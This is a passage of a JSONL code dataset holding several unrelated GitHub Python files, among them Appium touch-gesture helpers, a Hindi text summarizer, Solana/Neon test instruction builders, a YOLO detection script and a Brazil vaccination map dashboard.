float(step['data'].get('持续时间', 0.3))\n assert isinstance(elements, list) and len(\n elements) > 2, '坐标格式或数量不对,正确格式如:lock_pattern|1|4|7|8|9'\n location = self.locat(elements[0]) \n rect = location.rect\n w = rect['width'] / 6\n h = rect['height'] / 6\n\n key = {}\n key['1'] = (rect['x'] + 1 * w, rect['y'] + 1 * h)\n key['2'] = (rect['x'] + 3 * w, rect['y'] + 1 * h)\n key['3'] = (rect['x'] + 5 * w, rect['y'] + 1 * h)\n key['4'] = (rect['x'] + 1 * w, rect['y'] + 3 * h)\n key['5'] = (rect['x'] + 3 * w, rect['y'] + 3 * h)\n key['6'] = (rect['x'] + 5 * w, rect['y'] + 3 * h)\n key['7'] = (rect['x'] + 1 * w, rect['y'] + 5 * h)\n key['8'] = (rect['x'] + 3 * w, rect['y'] + 5 * h)\n key['9'] = (rect['x'] + 5 * w, rect['y'] + 5 * h)\n\n action = TouchAction(self.driver)\n for i in range(1, len(elements)):\n k = 
elements[i]\n            if i == 1:\n                action = action.press(\n                    x=key[k][0], y=key[k][1]).wait(duration * 1000)\n            action.move_to(x=key[k][0], y=key[k][1]).wait(duration * 1000)\n        action.release().perform()\n\n    def rocker(self, step):\n        elements = step['elements']\n        duration = float(step['data'].get('持续时间', 0.3))\n        rocker_name = step['data'].get('摇杆', 'rocker')\n        release = step['data'].get('释放', False)\n\n        # if isinstance(element, str):\n        #     if element:\n        #         element = [element]\n        #     else:\n        #         element = []\n\n        postions = []\n        for element in elements:\n            element = element.replace('，', ',')\n            p = element.split(',')\n            postions.append(p)\n\n        # 如果 action 中么有此摇杆名,则是新的遥感\n        if not self.action.get(rocker_name):\n            self.action[rocker_name] = TouchAction(self.driver)\n            self.action[rocker_name].press(\n                x=postions[0][0], y=postions[0][1]).wait(duration * 1000)\n            # 新摇杆的第一个点已操作,需要删除\n            postions.pop(0)\n        # 依次操作\n        for i in range(len(postions)):\n            self.action[rocker_name].move_to(\n                x=postions[i][0], y=postions[i][1]).wait(duration * 1000)\n\n        if release:\n            # 释放摇杆,并删除摇杆\n            self.action[rocker_name].release().perform()\n            del self.action[rocker_name]\n        else:\n            self.action[rocker_name].perform()\n\n    def scroll(self, step):\n        elements = step['elements']\n        assert isinstance(elements, list) and len(\n            elements) == 2, '元素格式或数量不对,正确格式如:origin_el|destination_el'\n        origin = self.locat(elements[0])\n        destination = self.locat(elements[1])\n        self.driver.scroll(origin, destination)\n\n    def flick_element(self, step):\n        elements = step['elements']\n        speed = step['data'].get('持续时间', 10)\n        assert isinstance(elements, list) and len(\n            elements) == 2, '坐标格式或数量不对,正确格式如:elment|200,300'\n        location = self.locat(elements[0])\n\n        end = elements[1].replace('，', ',').split(',')\n        end_x = int(end[0])\n        end_y = int(end[1])\n\n        if speed:\n            self.driver.flick_element(location, end_x, end_y, int(speed))\n\n    def flick(self, step):\n        elements = step['elements']\n        assert isinstance(elements, list) and len(\n            elements) == 2, '坐标格式或数量不对,正确格式如:100,200|300,400'\n\n        start = elements[0].replace('，', ',').split(',')\n        start_x = int(start[0])\n        start_y = int(start[1])\n\n        end = elements[1].replace('，', ',').split(',')\n        end_x = int(end[0])\n        end_y = int(end[1])\n\n        self.driver.flick(start_x, start_y, end_x, end_y)\n\n    def drag_and_drop(self, step):\n        elements = step['elements']\n        assert isinstance(elements, list) and len(\n            elements) == 2, '元素格式或数量不对,正确格式如:origin_el|destination_el'\n        origin = self.locat(elements[0])\n        destination = self.locat(elements[1]) \n        self.driver.drag_and_drop(origin, destination)\n\n    def long_press(self, step):\n        action = TouchAction(self.driver)\n\n        element = step['element']\n        duration = step['data'].get('持续时间', 1000)\n        if ',' in element or '，' in element:\n            position = element.replace('，', ',').split(',')\n            x = int(position[0])\n            y = int(position[1])\n            action.long_press(x=x, y=y, duration=duration).perform()\n        else:\n            location = self.locat(element)\n            action.long_press(location, duration=duration).perform()\n        sleep(0.5)\n\n    def pinch(self, step):\n        element = step['element']\n        location = self.locat(element)\n        percent = step['data'].get('百分比', 200)\n        steps = step['data'].get('步长', 50)\n        self.driver.pinch(location, percent, steps)\n\n    def zoom(self, step):\n        element = step['element']\n        location = self.locat(element)\n        percent = step['data'].get('百分比', 200)\n        steps = step['data'].get('步长', 50)\n        self.driver.zoom(location, percent, steps)\n\n    def hide_keyboard(self, step):\n        self.driver.hide_keyboard()\n\n    def shake(self, step):\n        
self.driver.shake()\n\n def launch_app(self, step):\n self.driver.launch_app()\n\n def is_locked(self, step):\n status = self.driver.is_locked()\n assert status, \"it's not locked\"\n\n def lock(self, step):\n self.driver.lock()\n\n def unlock(self, step):\n self.driver.unlock()","repo_name":"tonglei100/sweetest","sub_path":"sweet/modules/mobile/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16879,"program_lang":"python","lang":"en","doc_type":"code","stars":607,"dataset":"github-code","pt":"53"} +{"seq_id":"27268875644","text":"from rest_framework import serializers\n\nfrom users.models import User\nfrom api_yamdb.settings import RESERVED_NAME\n\n\ndef validate_users(self, data):\n if_username = User.objects.filter(username=data.get('username'))\n if_email = User.objects.filter(email=data.get('email'))\n if User.objects.filter(username=data.get('username'),\n email=data.get('email')).exists():\n return data\n if if_email:\n raise serializers.ValidationError(f'Почта {if_email}'\n f'уже использовалась')\n if if_username:\n raise serializers.ValidationError(f'Имя {if_username}'\n f'уже использовалось')\n if str(data.get('username')).lower() == RESERVED_NAME:\n raise serializers.ValidationError('Нельзя использовать имя me')\n return data\n","repo_name":"MihaRooll/yamdb_final","sub_path":"api_yamdb/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19558735726","text":"from django.shortcuts import render\nimport numpy as np\nimport sys\nimport pandas as pd\nimport nltk\nimport re\nimport codecs\nfrom hindi_summarizer.sent_segment import sent_tokenize\nfrom hindi_summarizer.word_segment import Tokenizer\nfrom bs4 import BeautifulSoup as bs\nimport requests as r\nimport networkx as nx\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport json\n#from hindi_summarizer.w2v import vocab\ndef main(l):\n try:\n if(l[0:12]==\"https://www.\"):\n all_of_it=\"\"\n req=r.get(l)\n con=req.content\n soup=bs(con,'html.parser')\n txt=soup.find_all('p')\n for i in txt:\n all_of_it+=i.text\n else:\n all_of_it=l\n print(all_of_it)\n out=re.split(',|\\.|\\|',all_of_it)\n sentences = sent_tokenize(all_of_it)\n with open('hindi_summarizer\\Aembed_hin.json',encoding='utf8') as f:\n word_embeddings=json.load(f)\n vectors=[]\n l=[]\n [l.append(0) for i in range(100)]\n for i in sentences:\n if len(i) != 0:\n v = sum([np.array(word_embeddings.get(w,l)) for w in i])/(len(i)+0.001)\n else:\n v = np.zeros((100,))\n vectors.append(v)\n print(vectors)\n mat = np.zeros([len(sentences), len(sentences)])\n for i in range(len(sentences)):\n for j in range(len(sentences)):\n if i != j:\n mat[i][j] = cosine_similarity(vectors[i].reshape(1,100),vectors[j].reshape(1,100))[0,0]\n nx_graph = nx.from_numpy_array(mat)\n hubs,scores = nx.hits(nx_graph,max_iter=100000000000000000000000000000000000)\n ranked_sentences = sorted(((scores[i],s) for i,s in enumerate(out)), reverse=True)\n c=0\n s=\"\"\n inl=[]\n k=0.2*len(out)\n for i in ranked_sentences:\n c+=1\n s+=i[1]+'|'\n if(c>k):\n break\n inl.append(s)\n inl.append(all_of_it)\n return inl\n except:\n inl=[]\n inl.append(\"Sorry for the inconvenience our backend does not support articles with bad encoding patterns please try with other websites or try copy pasting text instead of giving the link\")\n inl.append(l)\n 
return(l)\n","repo_name":"pramod-mamidi/hindi-and-english-text-summarizer","sub_path":"hindi_summarizer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4070657338","text":"NUMBER_OF_SENSORS = 8\nPLOTS_PER_ROw = 3\n\nplots = {\n # default plot parameters\n 'default': {\n 'title': 'Sensor {index}',\n 'color': '6F6',\n 'xrange': [0, 1000],\n 'yrange': [0, 10],\n 'fill': False,\n 'show': True,\n 'link_master': True\n },\n\n # specialized parameters\n 0: {\n 'title': 'Meh',\n 'color': '67C8FF',\n 'yrange': [40, 160],\n 'link_master': False\n },\n 5: {\n 'yrange': [0, 700],\n 'color': 'F66'\n },\n 4: {\n 'fill': '6F63'\n },\n\n #special plots\n 'time': {\n 'show': True,\n 'title': 'Time between updates'\n },\n 'master': {\n 'show': False\n }\n}\n\ntarget_period = 0.01\n\n# defines basic calibration/transformation functions\ntransform = {\n 'default': None,\n # scale [0,1024) => [50,150)\n 0: lambda x: x/1024*100+50,\n # identity\n 3: lambda x: x,\n}\n\n# export to file\nexport = {\n 'raws': {\n 'format': 'text',\n 'stage': 'acquisition',\n 'filename': 'data/raw_data.data'\n },\n 'transformed': {\n 'format': 'text',\n 'stage': 'transform',\n 'filename': 'data/scaled_data.data'\n }\n}","repo_name":"mvonthron/plotsplotsplots","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10376479947","text":"import hashlib\nimport json\nimport math\nimport random\n\nimport base58\nfrom solana.publickey import PublicKey\nfrom solana.system_program import SYS_PROGRAM_ID\nfrom solana.transaction import AccountMeta, TransactionInstruction\nfrom spl.token.constants import ASSOCIATED_TOKEN_PROGRAM_ID, TOKEN_PROGRAM_ID\nfrom spl.token.instructions import get_associated_token_address\n\nCOMPUTE_BUDGET_ID: PublicKey = PublicKey(\n \"ComputeBudget111111111111111111111111111111\")\nDEFAULT_UNITS = 500 * 1000\nDEFAULT_HEAP_FRAME = 256 * 1024\n\n\nclass Instruction:\n @staticmethod\n def account_v3(solana_wallet, neon_wallet_pda,\n neon_wallet, evm_loader_id) -> TransactionInstruction:\n keys = [\n AccountMeta(pubkey=solana_wallet,\n is_signer=True, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=neon_wallet_pda,\n is_signer=False, is_writable=True),\n ]\n\n data = bytes.fromhex('28') + bytes.fromhex(str(neon_wallet)[2:])\n return TransactionInstruction(\n program_id=PublicKey(evm_loader_id),\n keys=keys,\n data=data)\n\n @staticmethod\n def sync_native(account: PublicKey):\n keys = [AccountMeta(pubkey=account, is_signer=False, is_writable=True)]\n data = bytes.fromhex('11')\n return TransactionInstruction(keys=keys, program_id=TOKEN_PROGRAM_ID, data=data)\n\n\n @staticmethod\n def deposit(solana_pubkey, neon_pubkey, deposit_pubkey,\n neon_wallet_address, neon_mint, evm_loader_id) -> TransactionInstruction:\n associated_token_address = get_associated_token_address(\n solana_pubkey, neon_mint)\n pool_key = get_associated_token_address(deposit_pubkey, neon_mint)\n keys = [\n AccountMeta(pubkey=associated_token_address,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=pool_key, is_signer=False, is_writable=True),\n AccountMeta(pubkey=neon_pubkey, is_signer=False, is_writable=True),\n AccountMeta(pubkey=TOKEN_PROGRAM_ID,\n is_signer=False, is_writable=False),\n 
AccountMeta(pubkey=solana_pubkey,\n is_signer=True, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n ]\n\n data = bytes.fromhex('27') + bytes.fromhex(neon_wallet_address[2:])\n return TransactionInstruction(\n program_id=PublicKey(evm_loader_id),\n keys=keys,\n data=data)\n\n @staticmethod\n def compute_budget_utils(operator, units=DEFAULT_UNITS) -> TransactionInstruction:\n return TransactionInstruction(\n program_id=COMPUTE_BUDGET_ID,\n keys=[AccountMeta(PublicKey(operator.public_key),\n is_signer=True, is_writable=False)],\n data=bytes.fromhex(\"02\") + units.to_bytes(4, \"little\")\n )\n\n @staticmethod\n def request_heap_frame(operator, heap_frame=DEFAULT_HEAP_FRAME) -> TransactionInstruction:\n return TransactionInstruction(\n program_id=COMPUTE_BUDGET_ID,\n keys=[AccountMeta(PublicKey(operator.public_key),\n is_signer=True, is_writable=False)],\n data=bytes.fromhex(\"01\") + heap_frame.to_bytes(4, \"little\")\n )\n\n @staticmethod\n def associated_token_account(\n payer: PublicKey,\n associated_token: PublicKey,\n owner: PublicKey,\n mint: PublicKey,\n instruction_data: bytes,\n programId=TOKEN_PROGRAM_ID,\n associatedTokenProgramId=ASSOCIATED_TOKEN_PROGRAM_ID) -> TransactionInstruction:\n keys = [\n AccountMeta(pubkey=payer, is_signer=True, is_writable=True),\n AccountMeta(pubkey=associated_token,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=owner, is_signer=False, is_writable=False),\n AccountMeta(pubkey=mint, is_signer=False, is_writable=False),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=programId, is_signer=False, is_writable=False),\n ]\n\n return TransactionInstruction(\n keys=keys,\n program_id=associatedTokenProgramId,\n data=instruction_data\n )\n\n @staticmethod\n def claim(_from, to, amount, web3_client, ata_address,\n emulate_signer, contract, gas_price=None):\n emulated_tx = None\n result = dict()\n\n claim_to = contract.contract.functions.claimTo(\n bytes(ata_address), _from.address, amount)\n data = claim_to.abi\n\n tx = {\n \"from\": _from.address,\n \"to\": to,\n \"nonce\": web3_client.eth.get_transaction_count(emulate_signer.address),\n \"gasPrice\": gas_price if gas_price is not None else web3_client.gas_price(),\n \"chainId\": web3_client._chain_id,\n \"data\": json.dumps(data).encode('utf-8'),\n \"gas\": 100000000\n }\n\n signed_tx = web3_client._web3.eth.account.sign_transaction(\n tx, _from.key)\n\n if signed_tx.rawTransaction is not None:\n emulated_tx = web3_client.get_neon_emulate(\n str(signed_tx.rawTransaction.hex())[2:])\n\n if emulated_tx is not None:\n for account in emulated_tx['result']['accounts']:\n key = account['account']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n if 'contract' in account:\n key = account['contract']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n\n for account in emulated_tx['result']['solana_accounts']:\n key = account['pubkey']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n\n return signed_tx, result\n\n @staticmethod\n def buld_tx_instruction(solana_wallet, neon_wallet, neon_raw_transaction,\n neon_keys, evm_loader_id, neon_pool_count):\n program_id = PublicKey(evm_loader_id)\n treasure_pool_index = math.floor(random.randint(\n 0, 1) * int(neon_pool_count)) % int(neon_pool_count)\n treasure_pool_address = get_collateral_pool_address(\n treasure_pool_index, evm_loader_id)\n\n data 
= bytes.fromhex('1f') + treasure_pool_index.to_bytes(4, 'little') + \\\n bytes.fromhex(str(neon_raw_transaction.hex())[2:])\n keys = [AccountMeta(pubkey=solana_wallet, is_signer=True, is_writable=True),\n AccountMeta(pubkey=treasure_pool_address,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=neon_wallet,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=program_id, is_signer=False,\n is_writable=False),\n ]\n\n for k in neon_keys:\n keys.append(neon_keys[k])\n\n return TransactionInstruction(\n keys=keys,\n program_id=program_id,\n data=data\n )\n\n\ndef get_collateral_pool_address(index: int, evm_loader_id):\n return PublicKey.find_program_address(\n [bytes('treasury_pool', 'utf8'), index.to_bytes(4, 'little')],\n PublicKey(evm_loader_id)\n )[0]\n\n\ndef get_solana_wallet_signer(solana_account, neon_account, web3_client):\n solana_wallet = base58.b58encode(str(solana_account.public_key))\n neon_wallet = bytes(neon_account.address, 'utf-8')\n new_wallet = hashlib.sha256(solana_wallet + neon_wallet).hexdigest()\n emulate_signer_private_key = f'0x{new_wallet}'\n return web3_client._web3.eth.account.from_key(emulate_signer_private_key)\n","repo_name":"neonevm/neon-tests","sub_path":"utils/instructions.py","file_name":"instructions.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"27085334249","text":"\n\nwhile True:\n n1=input('Digite um numero:')\n operador=input ('Digite um operador[/*+-]:')\n n2=input('Digite um outro numero :')\n\n numeros_validos=None\n n1_float=0\n n2_float=0\n try:\n n1_float=float(n1)\n n2_float=float(n2)\n numeros_validos=True\n\n except Exception as error:\n \n print(error)\n\n\n if numeros_validos is None:\n print('Um ou ambos os numeros digitados são invalidos')\n continue\n operadores_permitidos='/*+-'\n if operador not in operadores_permitidos:\n print('Operador invalido')\n\n if len(operador)>1:\n print('Digite um unico operador')\n continue\n print('Realizando calculo')\n if operador =='+': \n print(n1_float+n2_float)\n elif operador =='-':\n \n print(n1_float-n2_float)\n elif operador =='*':\n \n print(n1_float*n2_float)\n elif operador =='/':\n \n print(n1_float/n2_float)\n\n ######\n sair= input('Sair?[s]').lower().startswith('s')\n \n if sair is True:\n break","repo_name":"Alesfjr/curso_python","sub_path":"calculadora/caculatorWHILE.PY","file_name":"caculatorWHILE.PY","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4685943665","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport claudio_funcoes_usage as cv # function usage geral\nimport pandas as pd\n#from .barras_fx_etaria import barras_fx_etaria, barras_sub_plot_vacina\n#maps\nimport plotly.express as px # plot dynamic\nimport datetime # time\nimport statistics # function statistics\nimport json\nfrom urllib.request import urlopen\nimport pandas as pd\nimport numpy\n\ndef read_data():\n \"\"\"Read data\"\"\"\n #filtered.csv': paciente_datanascimento;paciente_enumsexobiologico;paciente_racacor_codigo;paciente_endereco_uf;vacina_grupoatendimento_codigo;vacina_dataaplicacao;vacina_descricao_dose;vacina_codigo\n dados = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/filtered.csv', ';', 1000) # arquivo com os dados 
\n grupo_categoria = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/grupo-categoria.csv', ';') # 4 vacina_grupoatendimento_codigo[ vacina_grupoatendimento_codigo;vacina_grupoatendimento_nome;vacina_categoria_nome ]\n #grupo = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/grupo.csv', ';')\n raca = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/raca.csv', ';') # paciente_racacor_codigo, 2\n tipos_vacina = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/vacina.csv', ';') # vacina_codigo 7\n \n vacinas_estado = dict()\n for index in range(1,len(dados)): \n age = int( ( datetime.datetime.today() - datetime.datetime.strptime(dados[index][0], '%Y-%m-%d')).days / 365.25 )\n if vacinas_estado.get( dados[index][3] ) == None: \n vacinas_estado[ dados[index][3] ] = {'qtd' : 0, 'age' : [] }\n vacinas_estado[ dados[index][3] ] ['qtd'] +=1 # estado \n vacinas_estado[ dados[index][3] ] ['age'].append(age) # idade \n \n vacinas_estado = cv.remove_key_dict(vacinas_estado, 'XX'); vacinas_estado = cv.remove_key_dict(vacinas_estado, 'paciente_endereco_uf') \n for k in vacinas_estado: \n vacinas_estado[k]['age_media'] = statistics.mean( vacinas_estado[k]['age'] ) \n vacinas_estado[k]['age_median'] = statistics.median( vacinas_estado[k]['age'] ) \n vacinas_estado[k]['age_histogram'] = numpy.histogram(vacinas_estado[k]['age'], bins=10) \n \n dados = {'sigla': list(vacinas_estado.keys()), 'média idade' : [vacinas_estado[k]['age_media'] for k in vacinas_estado],\n 'mediana idade' : [vacinas_estado[k]['age_median'] for k in vacinas_estado],\n 'age_histogram' : [vacinas_estado[k]['age_histogram'] for k in vacinas_estado]}\n dados = pd.DataFrame(dados ) \n brasil = json.load(open( 'dataset/mapa_brasil'))\n \n nomes = []\n sigla_nome = {}\n for feature in brasil['features']: \n feature['id'] = feature['properties']['sigla'] \n #nomes.append( feature['properties']['name'] )\n sigla_nome [ feature['properties']['sigla'] ] = feature['properties']['name'] \n \n nomes_ordem = [] \n for d in dados['sigla']:\n #print(d)\n nomes_ordem.append(sigla_nome[d])\n dados['Nome'] = nomes_ordem\n \n #nomes_estados = ['Acre','Alagoas','Amazonas','Amapá','Bahia','Ceará','Espírito Santo','Goiás','Maranhão','Minas Gerais','Mato Grosso do Sul','Mato Grosso','Pará','Paraíba','Pernambuco','Piauí' ,'Paraná','Rio de Janeiro','Rio Grande do Norte','Rondônia','Roraima','Rio Grande do Sul','Santa Catarina', 'Sergipe', 'São Paulo', 'Tocantins', 'Distrito Federal']\n \n #dados['nomes'] = nomes\n #print(dados)\n \n #print(dados['nomes'])\n #print(dados['sigla'])\n \n fig = px.choropleth(\n dados,\n locations='sigla',\n geojson = brasil,\n color='média idade',\n hover_data=['Nome', 'mediana idade'],\n scope='south america'\n ) \n return fig\n #fig.show()\n \n #fig = px.bar(x=list(vacinas_estado.keys()), y=[vacinas_estado[k]['qtd'] for k in vacinas_estado]) \n #fig.update_layout(xaxis_title='Estados', yaxis_title='Quantidade de vacinas')\n #fig.show() \n #fig.write_html(\"html/mapa.html\")\n\n\n\ndef graficos_valiense(app):\n \n return read_data() \n\n components_html = []\n\n #components_html.append(grafico_total_vacinas_idade(app))\n \n #components_html.append(grafico_sub_plot_vacinas_idade(app))\n components_html.append( read_data() )\n\n return 
components_html","repo_name":"claudiovaliense/visualizacao_covid","sub_path":"valiense/graficos_valiense.py","file_name":"graficos_valiense.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6409265323","text":"# -*- coding: utf-8 -*-\n# @Time : 2019-10-15 16:40\n# @Author : Yan An\n# @Contact: an.yan@intellicold.ai\n\nfrom __future__ import print_function\n\nimport os\nimport cv2\nimport time\nimport pynvml\nimport random\nimport argparse\nimport numpy as np\n\nfrom utils import *\nfrom ctypes import *\nfrom tqdm import tqdm\n\ndef sample(probs):\n s = sum(probs)\n probs = [a/s for a in probs]\n r = random.uniform(0, 1)\n for i in range(len(probs)):\n r = r - probs[i]\n if r <= 0:\n return i\n return len(probs)-1\n\n\ndef c_array(ctype, values):\n arr = (ctype*len(values))()\n arr[:] = values\n return arr\n\n\nclass BOX(Structure):\n _fields_ = [(\"x\", c_float),\n (\"y\", c_float),\n (\"w\", c_float),\n (\"h\", c_float)]\n\n\nclass DETECTION(Structure):\n _fields_ = [(\"bbox\", BOX),\n (\"classes\", c_int),\n (\"prob\", POINTER(c_float)),\n (\"mask\", POINTER(c_float)),\n (\"objectness\", c_float),\n (\"sort_class\", c_int)]\n\n\nclass IMAGE(Structure):\n _fields_ = [(\"w\", c_int),\n (\"h\", c_int),\n (\"c\", c_int),\n (\"data\", POINTER(c_float))]\n\n\nclass METADATA(Structure):\n _fields_ = [(\"classes\", c_int),\n (\"names\", POINTER(c_char_p))]\n\n\nlib = CDLL(\"./darknet/libdarknet.so\", RTLD_GLOBAL)\nlib.network_width.argtypes = [c_void_p]\nlib.network_width.restype = c_int\nlib.network_height.argtypes = [c_void_p]\nlib.network_height.restype = c_int\n\npredict = lib.network_predict\npredict.argtypes = [c_void_p, POINTER(c_float)]\npredict.restype = POINTER(c_float)\n\nset_gpu = lib.cuda_set_device\nset_gpu.argtypes = [c_int]\n\nmake_image = lib.make_image\nmake_image.argtypes = [c_int, c_int, c_int]\nmake_image.restype = IMAGE\n\nget_network_boxes = lib.get_network_boxes\nget_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]\nget_network_boxes.restype = POINTER(DETECTION)\n\nmake_network_boxes = lib.make_network_boxes\nmake_network_boxes.argtypes = [c_void_p]\nmake_network_boxes.restype = POINTER(DETECTION)\n\nfree_detections = lib.free_detections\nfree_detections.argtypes = [POINTER(DETECTION), c_int]\n\nfree_ptrs = lib.free_ptrs\nfree_ptrs.argtypes = [POINTER(c_void_p), c_int]\n\nnetwork_predict = lib.network_predict\nnetwork_predict.argtypes = [c_void_p, POINTER(c_float)]\n\nreset_rnn = lib.reset_rnn\nreset_rnn.argtypes = [c_void_p]\n\nload_net = lib.load_network\nload_net.argtypes = [c_char_p, c_char_p, c_int]\nload_net.restype = c_void_p\n\ndo_nms_obj = lib.do_nms_obj\ndo_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]\n\ndo_nms_sort = lib.do_nms_sort\ndo_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]\n\nfree_image = lib.free_image\nfree_image.argtypes = [IMAGE]\n\nletterbox_image = lib.letterbox_image\nletterbox_image.argtypes = [IMAGE, c_int, c_int]\nletterbox_image.restype = IMAGE\n\nload_meta = lib.get_metadata\nlib.get_metadata.argtypes = [c_char_p]\nlib.get_metadata.restype = METADATA\n\nload_image = lib.load_image_color\nload_image.argtypes = [c_char_p, c_int, c_int]\nload_image.restype = IMAGE\n\nrgbgr_image = lib.rgbgr_image\nrgbgr_image.argtypes = [IMAGE]\n\npredict_image = lib.network_predict_image\npredict_image.argtypes = [c_void_p, IMAGE]\npredict_image.restype = 
POINTER(c_float)\n\nndarray_image = lib.ndarray_to_image\nndarray_image.argtypes = [POINTER(c_ubyte), POINTER(c_long), POINTER(c_long)]\nndarray_image.restype = IMAGE\n\n\ndef nparray_to_image(img):\n data = img.ctypes.data_as(POINTER(c_ubyte))\n image = ndarray_image(data, img.ctypes.shape, img.ctypes.strides)\n return image\n\n\ndef yolo_detect(net, meta, image, thresh=.5, hier_thresh=.1, nms=.45):\n im = nparray_to_image(image)\n num = c_int(0)\n pnum = pointer(num)\n predict_image(net, im)\n dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)\n num = pnum[0]\n if (nms): do_nms_obj(dets, num, meta.classes, nms);\n\n res = []\n for j in range(num):\n for i in range(meta.classes):\n if dets[j].prob[i] > 0:\n b = dets[j].bbox\n res.append((meta.names[i], dets[j].prob[i], (b.x, b.y, b.w, b.h)))\n res = sorted(res, key=lambda x: -x[1])\n\n free_image(im)\n free_detections(dets, num)\n return res\n\ndef main(args):\n gpu_id = c_int(args.gpu_id)\n set_gpu(gpu_id)\n\n info = load_dict()\n\n input_size = info['input_size']\n yolo_net = load_net(('./darknet/cfg/yolov3-' + str(input_size) + '_test.cfg').encode(),\n ('./darknet/backup/yolov3-' + str(input_size) + '.backup').encode(), 0)\n meta = load_meta(b'./darknet/cfg/voc.data')\n print('Finished loading model!')\n\n labels = [x for x in info['classes'].keys()]\n\n f = open('./darknet/dataset/valid.txt')\n test_picures_path = f.readlines()\n\n resumes = []\n for picture in tqdm(test_picures_path):\n picture = picture.replace('\\n', '')\n\n txt_name = picture.split('/')[-1].replace('jpg','txt')\n f2 = open('results_txt/' + txt_name, 'w', encoding = 'utf-8')\n image = cv2.imread(picture)\n begin = time.time()\n yolo_dets = yolo_detect(yolo_net, meta, image)\n resume = time.time() - begin\n resumes.append(resume)\n FPS = 1/(sum(resumes)/len(resumes))\n print('FPS: ',FPS)\n\n # visulization\n person_boxes = []\n\n for i, det in enumerate(yolo_dets):\n flag = True\n box = det[2]\n cx, cy, w, h = np.array(box)\n x1 = cx - w / 2\n y1 = cy - h / 2\n x2 = cx + w / 2\n y2 = cy + h / 2\n label = det[0].decode()\n index = labels.index(label)\n f2.write(str(index) + ' ' + str(int(x1 + 0.5)) + ' ' + str(int(y1 + 0.5)) + ' ' + str(int(x2 + 0.5)) + ' ' + str(int(y2 + 0.5)) + '\\n')\n if args.save_pic:\n cv2.rectangle(image,(int(x1),int(y1)),(int(x2),int(y2)),(0,255,0),2)\n cv2.putText(image,label,(int(x1), int(y1) - 10),cv2.FONT_HERSHEY_SIMPLEX,2,(0, 0, 255), 2)\n if args.save_pic:\n cv2.imwrite('results/'+picture.split('/')[-1],image)\n f.close()\n write_dict('FPS', int(FPS))\n\n GPU_type, GPU_used = get_gpu_info(args.gpu_id)\n write_dict('GPU_type: ',GPU_type)\n write_dict('GPU_used: ',str(int(GPU_used)) + 'M')\n \n\nif __name__ == '__main__':\n print('detecting...')\n parser = argparse.ArgumentParser('detect images')\n parser.add_argument(\"--gpu_id\", type=int, default=0, help=\"which gpu to use\")\n parser.add_argument(\"--save_pic\", type=bool, default=False, help=\"whether pic to save\")\n arguments = parser.parse_args()\n main(args=arguments)\n\n\n\n\n","repo_name":"isyanan1024/YOLOV3","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22207102638","text":"import pandas as pd\nimport streamlit as st\n\ndata_df = pd.DataFrame(\n {\n \"widgets\": [\"st.selectbox\", \"st.number_input\", \"st.text_area\", \"st.button\"],\n }\n)\n\nst.dataframe(\n data_df,\n column_config={\n 
